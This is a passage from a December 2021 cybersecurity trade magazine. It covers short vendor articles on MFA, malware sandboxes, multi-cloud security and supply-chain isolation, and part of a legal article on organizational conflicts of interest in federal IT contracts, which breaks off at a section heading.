Overall, the government's move towards MFA to provide a scalable and cost-effective <strong>for</strong>m of strong<br />
authentication is perfectly understandable. Governments and public organizations are <strong>for</strong>ced by the<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 74<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
constant exposure of countries to attacks by frequent cyberattacks as well as the growing pressure to<br />
increase access to public in<strong>for</strong>mation and accelerate action - especially in times of a pandemic - simply<br />
<strong>for</strong>ces governments to take steps that will ensure sensitive data to be protected with the highest possible<br />
measures.<br />
Hopefully the public officials and decision-makers will take into account the global adoption of MFA, and<br />
not only secure a fraction of government infrastructure with MFA. Only the global approach and the<br />
introduction of the zero trust security model has a chance to solve problems of identity theft and data<br />
leaks.<br />
About the Author<br />
Marcin Szary, CTO & co-founder, Secfense.<br />
Marcin Szary is a co-founder, CTO, and the person responsible<br />
<strong>for</strong> Secfense architecture and product development. Marcin has<br />
almost 20 years of technical experience with a focus on the<br />
security and identity management space. Be<strong>for</strong>e Secfense he<br />
held the position of CTO in multiple startups in the mobile,<br />
telecom, and security space. He was held responsible <strong>for</strong> R&D<br />
operations in the area of multi-factor authentication, mobile<br />
payments, notification services within GSM networks, and more.<br />
Marcin can be reached online at marcin@secfense.com, Marcin Szary | LinkedIn and at our company<br />
website https://secfense.com/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 75<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Why Do You Need a Malware Sandbox?<br />
By ANY.RUN Team<br />
To solve the problem of identifying previously unknown malware samples help malware sandboxes –<br />
protection systems that allow you to evaluate the security of software by running and analyzing it in an<br />
isolated virtual environment. This article will lead you through all the details of what it is and why any<br />
organization needs this service.<br />
What is a malware sandbox?<br />
Malware sandbox is an established class of solutions on the market. The main task of a sandbox is to<br />
check the objects placed in it, collect events in the network <strong>for</strong> further analysis, as well as process the<br />
collected data. Each event is verified according to configured policies.<br />
A sandbox is an isolated environment where an object, such as a suspicious file, is sent <strong>for</strong> analysis. The<br />
sandbox collects as much telemetry and context as possible from the pre-configured sensors in the<br />
network. The sensors can be any existing device or application: a mail gateway, workstation agents, or<br />
a firewall that sends files to the sandbox <strong>for</strong> inspection. Or a malware analyst can upload a file or submit<br />
a link <strong>for</strong> further research by themselves.<br />
It is important to check malware in different circumstances. And almost all operating systems are<br />
supported by a sandbox to reveal malware behavior. A customized sandbox is already a tool against<br />
targeted attacks. Customization, as always, depends on the user's priorities.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 76<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Why do you need a malware sandbox?<br />
It is not always possible to detect malicious code in static analysis. The sandbox allows you to deploy a<br />
sample, examine its work and behavior in dynamics. The tool helps to build protection against any<br />
malicious objects: backdoors, downloaders, bankers, ransomware, etc. Websites, applications, and<br />
operating systems – the service landscape is huge. The sandbox is often placed in the DMZ segment,<br />
between the perimeter firewall and the core.<br />
What is the difference between a sandbox and an antivirus?<br />
A malware sandbox dynamically analyzes objects in an isolated network environment that has no<br />
connection to the company's network and allows the object to reveal itself as much as possible. Hostbased<br />
antivirus works another way around, it aims to block malware and its actions. Antivirus or EDR is<br />
the next tier of protection. Most importantly, the malicious object should not reach the workstation.<br />
What types of objects are handled by the sandbox?<br />
It can be links, binaries, word or excel files, images, any customer objects. It is worth mentioning that<br />
there is no sense in analyzing files larger than 300 MB. There are separate specific solutions <strong>for</strong> analyzing<br />
large files, this is very rarely needed.<br />
Malicious objects get to sandbox from several sources like Firewalls, mail gateway, WAF. And many<br />
standard protocols are supported <strong>for</strong> the exchange: Syslog, ICAP, SMTP, NFS. You can integrate the<br />
sandbox via an API into almost any environment, so all kinds of organizations can benefit from this tool.<br />
Does the sandbox help protect against an APT attack?<br />
Yes, the sandbox helps in defending against advanced persistent threats, APT attacks because it allows<br />
you to analyze events in depth. A malicious object can have different signatures and bypass the antivirus,<br />
but the behavior stays about the same, which the sandbox shows. One of the main goals is to make the<br />
sandbox the most attractive <strong>for</strong> malware so that it can expose itself as much as possible in a controlled,<br />
secure environment. For example, the interactive approach of ANY.RUN sandbox triggers malware that<br />
requires direct human actions. Drag a mouse, tap keys, create specific files and folders, open documents<br />
– do everything to trick malware.<br />
Of course, you can create your own isolated environment <strong>for</strong> malware analysis from scratch. But it takes<br />
a lot of ef<strong>for</strong>t and time in preparation. And still, there is a chance that your sandbox will not be secure<br />
enough, invisible <strong>for</strong> malware, and provide the necessary in<strong>for</strong>mation. To speed up the process we<br />
recommend using ready-made solutions like ANY.RUN. It is an online service, so you can run a sample<br />
from anywhere and get results right away.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 77<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Specialist qualifications <strong>for</strong> working with the sandbox<br />
With a competent and intuitive interface, the high qualification of an employee is not required. Sandboxes<br />
like ANY.RUN makes easy and fast analysis its main advantage. A little experience and a general<br />
understanding of the cyber security processes are enough. To solve incidents and investigations, you<br />
need a higher level but still ANY.RUN service’s all details and in<strong>for</strong>mation are displayed conveniently,<br />
so you won’t miss a thing and carry out a complete analysis.<br />
Sandbox reports are transparent and readable (MITRE matrix, screenshots, and videos, IOCs, behavior<br />
activities, etc.). The collected in<strong>for</strong>mation is aggregated and optimized, the report saves time <strong>for</strong> a<br />
technician.<br />
Conclusion<br />
A sandbox is one of the most important elements in building corporate infrastructure protection. A modern<br />
sandbox not only blocks the spread of a malicious object but also structures a significant amount of<br />
dynamic analysis data, passing this data to a specialist <strong>for</strong> further evaluation or via standard exchange<br />
protocols to other cybersecurity products.<br />
The malware sandbox functions with almost any operating system and device. The use of this tool<br />
gradually speeds up both investigation and verdict issuance. On average, delays in issuing a verdict are<br />
a few minutes. The global sandboxing market is growing rapidly and is projected to double in 2 years.<br />
And it’s clear that a malware sandbox is an effective service that you definitely need.<br />
About the Author<br />
ANY.RUN is the first interactive online malware analysis<br />
sandbox. The service provides detection, analysis, and<br />
monitoring of cybersecurity threats. Based on the interactive<br />
approach of investigations, ANY.RUN offers users to affect<br />
the virtual machine by launching various programs, changing<br />
configurations, rebooting the system, and running different scenarios. The user is in full control of the<br />
analysis flow in real-time. Find out more here: https://any.run/.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 78<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Multi-Cloud Security and Compliance: Challenges & Best<br />
Practices<br />
By Avi Shua, CEO and Co-Founder, Orca Security<br />
Organizations are increasingly moving their operations to not just one, but in many cases, multiple public<br />
clouds. In a recent State of the Cloud Strategy Survey by HashiCorp, 76% of respondents said that they<br />
were already pursuing multi-cloud strategies. A further 47% of those respondents also said that security<br />
was a top cloud inhibitor. Multi-cloud strategies complicate cloud security and compliance even more<br />
since controls and policies need to be applied consistently across multiple cloud environments. However,<br />
by following a number of best practices, security teams can significantly minimize the complexity and<br />
overhead of securing a multi-cloud environment, allowing businesses to fully optimize their cloud strategy.<br />
What is a Multi-Cloud Strategy?<br />
A multi-cloud strategy is when organizations leverage multiple IaaS public cloud service providers - such<br />
as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud - to optimize their IT services and<br />
infrastructure. Since each cloud provider offers slightly different services and pricing models,<br />
organizations can get the best service at the best price by utilizing multiple cloud providers.<br />
The concept is best explained by a supermarket analogy. For instance, you might like to shop at a natural<br />
grocer <strong>for</strong> some favorite organic items and there<strong>for</strong>e accept that the pricing is a little higher. However, <strong>for</strong><br />
more staple items, you might choose to go to a regular store since the prices are much lower. In short,<br />
you’re optimizing your grocery shopping based on the individual offerings and prices of each different<br />
store, which is similar to a multi-cloud strategy.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 79<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
What’s the Difference Between the Cloud Plat<strong>for</strong>ms?<br />
Like supermarkets, all cloud providers have similar offerings, but each takes a slightly different approach.<br />
While by no means a full comparison, we have included a short summary of how each of the leading<br />
cloud provider plat<strong>for</strong>ms delivers value in different areas:<br />
• AWS offers the widest selection of services, including compute, storage, database, analytics,<br />
networking, mobile, developer tools, management tools, IoT, security, and enterprise<br />
applications.<br />
• Azure has the benefit of combining productivity and enterprise software (such as Office 365 and<br />
Teams) with flexible cloud computing resources <strong>for</strong> developers in one plat<strong>for</strong>m.<br />
• Google Cloud stands out <strong>for</strong> its technological advancement around open source technologies,<br />
especially containers, and played an instrumental role in the development of Kubernetes, a<br />
container orchestration plat<strong>for</strong>m that is now becoming an industry standard.<br />
What Are the Advantages of a Multi-cloud Strategy?<br />
It is not surprising that most companies are utilizing multiple cloud plat<strong>for</strong>ms, since this strategy allows<br />
companies to:<br />
• Optimize access to services: As described above, some cloud service providers are more<br />
specialized in providing certain services than other providers, so it makes sense to select the best<br />
cloud provider <strong>for</strong> each specific service that you require.<br />
• Spread risk and resilience: It’s always a good idea to avoid ‘putting all your eggs in one basket.’<br />
For instance, if there is an outage or other issue with one cloud service provider, the other cloud<br />
plat<strong>for</strong>ms will likely not be affected.<br />
• Reduce cost and dependency: By adopting multiple cloud providers, enterprises can stay<br />
nimble and switch providers to optimize spending, rather than being locked into one provider and<br />
facing high operational costs to move services.<br />
Security and Compliance Challenges of Multi-cloud Environments<br />
Although it makes a lot of business sense to use multiple cloud providers, it can complicate security and<br />
compliance ef<strong>for</strong>ts tremendously since security controls and policies should be consistent across the<br />
board. With most native cloud provider security tools only covering their own plat<strong>for</strong>m, and not all thirdparty<br />
solutions supporting multiple cloud providers, security and compliance <strong>for</strong> multi-cloud environments<br />
can quickly become an operational nightmare.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 80<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
If security controls are not consolidated in one plat<strong>for</strong>m, this leads to the following issues:<br />
• Lack of central visibility: Using different solutions <strong>for</strong> each cloud plat<strong>for</strong>m - and often even<br />
multiple solutions per plat<strong>for</strong>m, such as cloud security posture managers (CSPM) and cloud<br />
workload protection plat<strong>for</strong>ms (CWPP) - makes it nearly impossible to get a centralized overview<br />
of risks. This means that you will not have a clear handle on your overall cloud security posture<br />
and which risks require the most immediate attention.<br />
• High operational costs: Duplicating security policies <strong>for</strong> different cloud security and compliance<br />
tools can quickly become an exhausting drain on your already understaffed cloud security team.<br />
Cloud workload protection plat<strong>for</strong>ms (CWPPs) also require the installation of an agent on every<br />
cloud resource to be monitored. The larger and more diversified your cloud estate, the more time<br />
consuming it is to install and maintain agents <strong>for</strong> every resource.<br />
• Lack of consistency: If you are <strong>for</strong>ced to use several different cloud security tools with each<br />
having different configuration options, it is a complex task to ensure the same security and<br />
compliance checks are per<strong>for</strong>med across all cloud estates.<br />
• Increased chance of errors: The more manual intervention and duplication security policies<br />
require, the more room <strong>for</strong> human error and wrongly configured security controls.<br />
Best Practices <strong>for</strong> Multi-cloud Security and Compliance<br />
To minimize the complexity and overhead of securing a multi-cloud environment, follow these five best<br />
practices:<br />
1. Insist on multi-cloud support: This one is a no-brainer; make sure your cloud security vendor<br />
supports multiple cloud provider plat<strong>for</strong>ms.<br />
2. Consolidate cloud security solutions: Leverage full stack cloud security solutions (CWPP and<br />
CSPM in one - also referred to as a cloud-native application protection plat<strong>for</strong>m -- CNAPP), so<br />
you can reduce the number of point solutions and replace them with a single tool <strong>for</strong> all your cloud<br />
environments.<br />
3. Go agentless: Eliminate resource-heavy agent deployments that reduce nimbleness and hinder<br />
your ability to move applications to other cloud plat<strong>for</strong>ms when needed.<br />
4. Get plat<strong>for</strong>m specific mitigation steps: Use a cloud security solution with contextual intelligence<br />
that prioritizes critical risks and provides plat<strong>for</strong>m specific mitigation instructions to make it easier<br />
<strong>for</strong> practitioners to work on multiple cloud plat<strong>for</strong>ms.<br />
5. Identify cost saving strategies: Make your CISO love you by using a cloud security tool that<br />
allows you to view detailed in<strong>for</strong>mation on each asset on every cloud plat<strong>for</strong>m, including how often<br />
it is used. This enables you to advise on further cost saving strategies, such as moving certain<br />
applications to other cloud plat<strong>for</strong>ms and consolidating or removing redundant services.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 81<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
In the age of multi-cloud, security has become more complex and time consuming than ever be<strong>for</strong>e.<br />
However, by using a holistic cloud security approach that can establish consistent security controls<br />
across multiple cloud environments, complexity and duplicated ef<strong>for</strong>ts can be greatly reduced. This allows<br />
security teams to waste less time on operational tasks and instead focus on securing the cloud<br />
environments.<br />
About the Author<br />
Avi Shua is the CEO and co-founder of Orca Security. He<br />
invented the patent-pending SideScanning technology upon<br />
which Orca Security is built. SideScanning uses novel, out of<br />
band, zero impact integration with the cloud virtualization layer<br />
to gain full visibility into those risks that matter most—<br />
vulnerabilities, malware, misconfigurations, weak and leaked<br />
passwords, lateral movement risk and improperly secured<br />
customer data. Learn more at Orca.Security.<br />
Avia Shua can be reached online at Twitter and at our company website https://orca.security/<br />
LinkedIn - https://www.linkedin.com/in/avishua/<br />
Twitter (Orca Security) - https://twitter.com/orcasec<br />
Twitter (Avi Shua) - https://twitter.com/shua_avi<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 82<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How Do You Secure the Modern Supply Chain?<br />
By Brett Raybould, EMEA Solutions Architect, Menlo Security<br />
Supply chains demand better security and in today’s highly interconnected world, this means more<br />
security innovation.<br />
The day-to-day operations of a supply chain are often complex, with businesses and individuals<br />
demanding that products and services are delivered quickly, efficiently, cost-effectively and,<br />
increasingly, sustainably. The role of supply chains has come sharply into focus in the last 18 months<br />
during the global pandemic with major challenges <strong>for</strong> many industries, including retail, manufacturing,<br />
energy and oil & gas.<br />
We have seen cases of empty supermarket shelves across several countries, as well as concerns<br />
around energy supplies to keep the lights on. Companies have voiced concerns about supply chain<br />
bottlenecks due to a spike in demand <strong>for</strong> items, such as agricultural and petrochemical commodities,<br />
paper, chemicals and construction materials, in many cases leading to inflation.<br />
Growing pressures<br />
So the pressure has never been more intense. Add to this, the increase in cyber attacks on supply<br />
chains in recent years. ENISA, the European Union Agency <strong>for</strong> <strong>Cyber</strong>security, estimates that there<br />
will be four times more supply chain attacks in <strong>2021</strong> than last year 1 .<br />
The ransomware attack in May on the Colonial Pipeline has been one of most high profile security<br />
stories this year. The attack by hacking group, DarkSide, shut down a 5,500 mile-long fuel pipeline on<br />
the east coast of the US, which carries 45% of the fuel used on the east coast. Since then the US<br />
1<br />
https://www.enisa.europa.eu/publications/threat-landscape-<strong>for</strong>-supply-chain-attacks<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 83<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
government has offered a bounty of up to $10million (£7.4m) <strong>for</strong> in<strong>for</strong>mation about the group, the largest<br />
bounty of its kind.<br />
The IT industry is not immune from supply chain attacks either. SolarWinds suffered an attack last year<br />
with hackers gaining access to the production system <strong>for</strong> Orion, SolarWinds’ flagship software. While in<br />
July, Kaseya, a provider of IT management software <strong>for</strong> MSPs and small to medium-sized businesses<br />
suffered a ransomware attack. As with the SolarWinds attack, the malware spread amongst Kaseya’s<br />
clients and affected dozens of businesses.<br />
So while organisations must manage the potential fallout of security breaches to themselves –<br />
reputational damage, disruption costs and more – the knock-on effect to customers, partners and the<br />
rest of the supply chain is potentially huge.<br />
Digitisation of the supply chain<br />
The ongoing digitisation of the supply chain, often through the cloud, has delivered major efficiency and<br />
cost benefits, with shared data and systems in areas such as integrated planning and execution systems,<br />
logistics visibility, autonomous logistics, smart procurement and warehousing, spare parts management<br />
and analytics.<br />
For a big company like Siemens, <strong>for</strong> example, working at the bleeding edge of supply chain innovation,<br />
the creation of a cloud-based operating system means that it can process data in real time from millions<br />
of devices and sensors in plants, systems, machinery and products dispersed throughout production<br />
processes and supply chains.<br />
Siemens may be working towards ‘supply chain nirvana’, where processes and decisions happen with<br />
minimal human intervention. But the reality <strong>for</strong> many suppliers, logistics companies, manufacturers and<br />
retailers is that business happens in browsers, on email and with shared files. The more we use the<br />
Internet to collaborate and communicate, the more we are exposed. Research has shown that web and<br />
email attacks are behind 90% 2 of all breaches.<br />
The increased adoption of cloud applications within the supply chain, accelerated by the challenges of<br />
COVID, has made the browser the most important productivity tool on any endpoint. But at the same<br />
time, the majority of cyber attacks start with the browser, and it doesn’t take much <strong>for</strong> a determined<br />
attacker to understand your key suppliers and partners and use this to target users with phishing emails<br />
and infected attachments, websites and downloadable documents.<br />
2<br />
Sources Google, Verisign<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 84<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The case <strong>for</strong> isolation<br />
Supply chains are evolving to be as much about the efficient exchange of in<strong>for</strong>mation as they are about<br />
the flow of goods and services. But where there is in<strong>for</strong>mation sharing, cybersecurity professionals are<br />
rightly uneasy. Menlo Labs has seen a steady rise in ‘credential phishing’ attacks by creating fake login<br />
pages or <strong>for</strong>ms to steal users’ credentials <strong>for</strong> commonly used services, including email and document<br />
exchanges with supply chain partners.<br />
Attackers can use credential phishing to breach an organisation’s smaller supply chain partner (whose<br />
controls may be easier to bypass) then use an exchange of in<strong>for</strong>mation, containing malware, as an easy<br />
way to laterally move and infect the larger enterprise. If this company is consciously or unconsciously<br />
allowing smaller partners to store sensitive data, attackers don’t even need to move laterally – the data<br />
is already freely available on the smaller partner’s network.<br />
We can all fall victim to a seemingly normal website or email. So now businesses are exploring options<br />
that isolate employees’ devices. Rather than detecting threats and blocking employees from accessing<br />
potentially malicious web content, this approach simply isolates all endpoints from browser-based traffic.<br />
If you take the example of a large, global manufacturer with many employees engaged in digital research<br />
and communications, they were trying to manage large volumes of phishing attacks and web malware.<br />
This meant infected devices required costly, time-consuming reimaging. While anti-phishing training <strong>for</strong><br />
employees had some impact in reducing attacks, many employees continued to click on infected links<br />
leading to credential theft and malware infection.<br />
Isolation has changed this as all the unknown executable code from the Internet that employees<br />
previously came into contact with – including any websites visited – are now executed in a remote cloud<br />
container. Whether browsing online, reading emails or downloading documents, it is impossible <strong>for</strong><br />
malware to infect users’ devices or the network. Plus, there is no impact on user accessibility or<br />
per<strong>for</strong>mance.<br />
To reduce risk but maintain agility, fast-moving organisations in the manufacturing, logistics, retail and<br />
other industries are deploying solutions to prevent malicious code from ever reaching the network<br />
perimeter – mobilising isolation-powered cloud security to shut the door on malware from within any<br />
supply chain communications.<br />
Isolation, however, will not protect an entire supply chain system from the growing number and range of<br />
attacks. <strong>Cyber</strong>security <strong>for</strong> these critical networks needs security and IT specialists to have conversations<br />
with a wider range of functions, such as sourcing, vendor and partner management and logistics, in a<br />
coordinated ef<strong>for</strong>t to reduce risks.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 85<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Brett Raybould, EMEA Solutions Architect, Menlo Security<br />
Brett Raybould is EMEA Solutions Architect at Menlo<br />
Security, a leader in cloud security. In this role, he is<br />
responsible <strong>for</strong> technical sales, product demonstrations,<br />
installations, solution proposals and evaluations. Brett joined<br />
Menlo Security in 2016 and discovered how Isolation<br />
technology provides a new approach to solving the problems<br />
that detection-based systems continue to struggle with.<br />
Passionate about security, Brett has worked <strong>for</strong> over 15<br />
years <strong>for</strong> some of the leading vendors specialising in the detection of inbound threats across web and<br />
email, and data loss prevention (DLP) including FireEye and Websense. He has represented Menlo<br />
Security as a speaker at industry events, including e-Crime & <strong>Cyber</strong>security Congress and Cloud Security<br />
Expo.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 86<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Don’t Take Yourself Out of The Game: Mitigating the Risk<br />
Of An Organizational Conflict Of Interest In Federal<br />
Contracts<br />
By Michelle Litteken, Of Counsel, Morris, Manning & Martin LLP<br />
Nearly every solicitation <strong>for</strong> a federal government contract contains a provision pertaining to<br />
organizational conflicts of interest (OCI). These OCI provisions are important as the existence of an OCI<br />
can result in the loss of a contract. The risk of an OCI is particularly acute in the in<strong>for</strong>mation technology<br />
(IT) and cybersecurity sectors because of the nature of the work per<strong>for</strong>med, as well as the access to<br />
sensitive in<strong>for</strong>mation that providing such services may facilitate. Yet, many government contractors do<br />
not understand OCIs, and as a result, are unable to identify potential OCIs or proactively implement<br />
measures to avoid or mitigate an OCI. It is not uncommon <strong>for</strong> a contractor to be unaware of a potential<br />
or actual OCI until after a contracting officer raises the topic or a competitor files a bid protest. At that<br />
stage, it may be difficult – if not impossible – to mitigate or avoid the OCI. For this reason, gaining a<br />
better understanding of OCIs can provide a contractor with a competitive advantage.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 87<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Understanding OCIs<br />
Contracting officers are required to determine whether a potential or actual OCI will arise as early in an<br />
acquisition as possible. 3 If the award to a particular offeror would result in an actual or potential OCI, and<br />
the OCI cannot be mitigated or avoided, the offeror will likely be deemed ineligible <strong>for</strong> the award.<br />
There are three types of OCIs:<br />
• Unequal Access to In<strong>for</strong>mation: This type of OCI arises in situations in which a contractor has<br />
access to non-public in<strong>for</strong>mation as part of its per<strong>for</strong>mance of one government contract and that<br />
in<strong>for</strong>mation may provide the firm with a competitive advantage in a later competition <strong>for</strong> another<br />
government contract.<br />
• Biased Ground Rules: This type of OCI issue arises in situations when a contractor, as part of<br />
its per<strong>for</strong>mance of a government contract, has, in some sense, set the ground rules <strong>for</strong><br />
government procurement, <strong>for</strong> example, by preparing the statement of work or the specifications.<br />
The concern with a biased ground rules OCI is that the contractor may have skewed the<br />
procurement in the contractor’s favor – even if unintentionally.<br />
• Impaired Objectivity: This type of OCI issue arises in cases when a contractor’s work under one<br />
government contract could entail it evaluating itself, an affiliate, or a competitor, either through an<br />
assessment of per<strong>for</strong>mance under another contract or an evaluation of proposals as part of<br />
another contract. This type of OCI occurs when the contractor may not be able to provide the<br />
government with impartial advice or assessments.<br />
It is important to recognize that a single contract may give rise to more than one type of OCI. For example,<br />
if a contractor was per<strong>for</strong>ming a contract that involved independent verification and validation (IV&V)<br />
tasks related to IT systems used by an agency, the contractor could have both an equal access to<br />
in<strong>for</strong>mation OCI and an impaired objectivity OCI. The unequal access to in<strong>for</strong>mation OCI would result<br />
from the contractor having access to nonpublic in<strong>for</strong>mation about the IT systems provided to the agency<br />
by other contractors. And, an impaired objectivity OCI could arise because the IV&V tasks would likely<br />
require the contractor to assess the services or products provided by other contractors.<br />
OCI Risks <strong>for</strong> <strong>Cyber</strong>security and IT Services<br />
The type of tasks common to contracts involving cybersecurity or IT services can increase the risk of an<br />
OCI. Namely, providing these types of services to the government often puts a contractor in a position<br />
where it has access to nonpublic government or competitor in<strong>for</strong>mation – an unequal access to<br />
in<strong>for</strong>mation OCI – or requires the contractor to assess the services or products provided by competitors<br />
or affiliates – an impaired objectivity OCI.<br />
3 48 C.F.R. 9.504(a)(1).<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 88<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The U.S. Government Accountability Office’s (GAO) bid protest decision in Steel Point Solutions, LLC 4 ,<br />
provides an instructive example of how an impaired objectivity OCI can come about while providing IT<br />
services to the government. The protest involved a solicitation to design, build, and operate a corporate<br />
automation implementation center <strong>for</strong> the National Geospatial-Intelligence Agency (NGA). The scope of<br />
work included recommending, designing, deploying, monitoring, and maintaining robotic process<br />
automation solutions <strong>for</strong> the NGA. Deloitte Consulting, LLP (Deloitte) was selected <strong>for</strong> the award, and a<br />
protester challenged the award, arguing Deloitte had task orders with the NGA that created an impaired<br />
objectivity OCI.<br />
Under one of the task orders, Deloitte supported the NGA in determining what products to purchase to<br />
maintain NGA’s IT portfolio. At the same time, under the protested contract, Deloitte would be deploying<br />
and maintaining IT systems if the contract award was upheld. Stated differently, under the task order,<br />
Deloitte would be making recommendations to the NGA about what products to purchase to maintain the<br />
IT systems under the protested contract – which could include Deloitte’s own offerings. GAO<br />
characterized the situation as a “textbook example” of an impaired objectivity OCI because Deloitte would<br />
be “in a position to make judgments or recommendations that would have the effect of directly influencing<br />
its own well-being.”<br />
GAO also found a separated Deloitte task order presented an impaired objectivity OCI. Under the second<br />
task order, Deloitte facilitates the review and approval of all NGA in<strong>for</strong>mation systems. In its proposal <strong>for</strong><br />
the protested contract, Deloitte recognized there was a potential OCI because its work under the task<br />
order could require Deloitte to determine whether to approve systems to be used under other contracts,<br />
and Deloitte attempted to address the potential OCI using the template mitigation plan that was provided<br />
with the solicitation. GAO found the mitigation plan was vague and nonspecific, and the separate<br />
mitigation plan Deloitte submitted <strong>for</strong> the task order was ultimately of no help because the plan depended<br />
on Deloitte not pursuing work that would give rise to an OCI – which clearly did not work because of<br />
Deloitte’s decision to compete <strong>for</strong> the protested contract. GAO sustained the protest and recommended<br />
that the NGA reconsider its OCI analysis.<br />
One can easily imagine how the task order discussed above could give rise to an unequal access to<br />
in<strong>for</strong>mation OCI. For example, advising an agency about the types of IT services and products to procure<br />
could provide a contractor with in<strong>for</strong>mation about the agency’s budget <strong>for</strong>ecasts, future requirements,<br />
and acquisition plans – all competitively useful nonpublic in<strong>for</strong>mation. Likewise, facilitating the review<br />
and approval of an agency’s in<strong>for</strong>mation systems would provide a contractor with in<strong>for</strong>mation about<br />
competitors’ systems and the agency’s requirements – also competitively useful nonpublic in<strong>for</strong>mation.<br />
At this point, the significance of OCIs <strong>for</strong> contractors working in the IT and cybersecurity sectors should<br />
be clear.<br />
OCIs Caused by Subcontractors<br />
Contractors should also be mindful of the fact that a subcontractor can introduce an OCI into a<br />
procurement. If a subcontractor would have an OCI as a prime contractor <strong>for</strong> a given opportunity,<br />
per<strong>for</strong>ming as a subcontractor does not remove the OCI.<br />
4 Steel Point Solutions, LLC, B- 419709, B-419709.2, July 7, <strong>2021</strong>, <strong>2021</strong> CPD 254.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 89<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
GAO’s decision in L-3 Services, Inc. 3 , demonstrates how a subcontractor’s existing contractual<br />
relationships can cause an OCI <strong>for</strong> a prime contractor. The bid protest involved a contract to consolidate<br />
operations and maintenance requirements <strong>for</strong> networks at seven operating bases. The protester argued<br />
that the awardee had an unequal access to in<strong>for</strong>mation OCI and a biased ground rules OCI because<br />
another company affiliated with the awardee’s subcontractor had provided technical guidance <strong>for</strong> the<br />
protested requirement and had access to unredacted copies of contracts, core communications<br />
requirements, internal agency in<strong>for</strong>mation about upgrading communications and IT infrastructure, and<br />
proprietary in<strong>for</strong>mation of other companies.<br />
After the protest was filed, the agency argued there was no unequal access to in<strong>for</strong>mation OCI because<br />
(i) the in<strong>for</strong>mation was not competitively useful and (ii) the in<strong>for</strong>mation used to develop the solicitation<br />
was disclosed to all offerors. GAO rejected these arguments, finding neither the contractor nor the<br />
agency had tracked what in<strong>for</strong>mation the affiliated company had access to over the course of<br />
per<strong>for</strong>mance. GAO surmised that the affiliated company likely had access to nonpublic in<strong>for</strong>mation the<br />
agency was not aware of and that was never disclosed to offerors. Notably, in overturning the award,<br />
GAO did not base its decision on whether or not the prime awardee actually had access to the<br />
in<strong>for</strong>mation. Instead, GAO held that access by an affiliate of a subcontractor was sufficient to create an<br />
OCI.<br />
GAO also held there was a biased ground rules OCI because although the subcontractor’s affiliate did<br />
not draft the specifications, the affiliated company participated in the business/mission case development.<br />
GAO also noted the affiliated company’s research became part of the source in<strong>for</strong>mation used to develop<br />
the requirement. GAO sustained the protest, recommended the awardee’s subcontractor be excluded<br />
from the completion, and recommended the procuring agency conduct a new OCI investigation and<br />
determination.<br />
Mitigating an OCI<br />
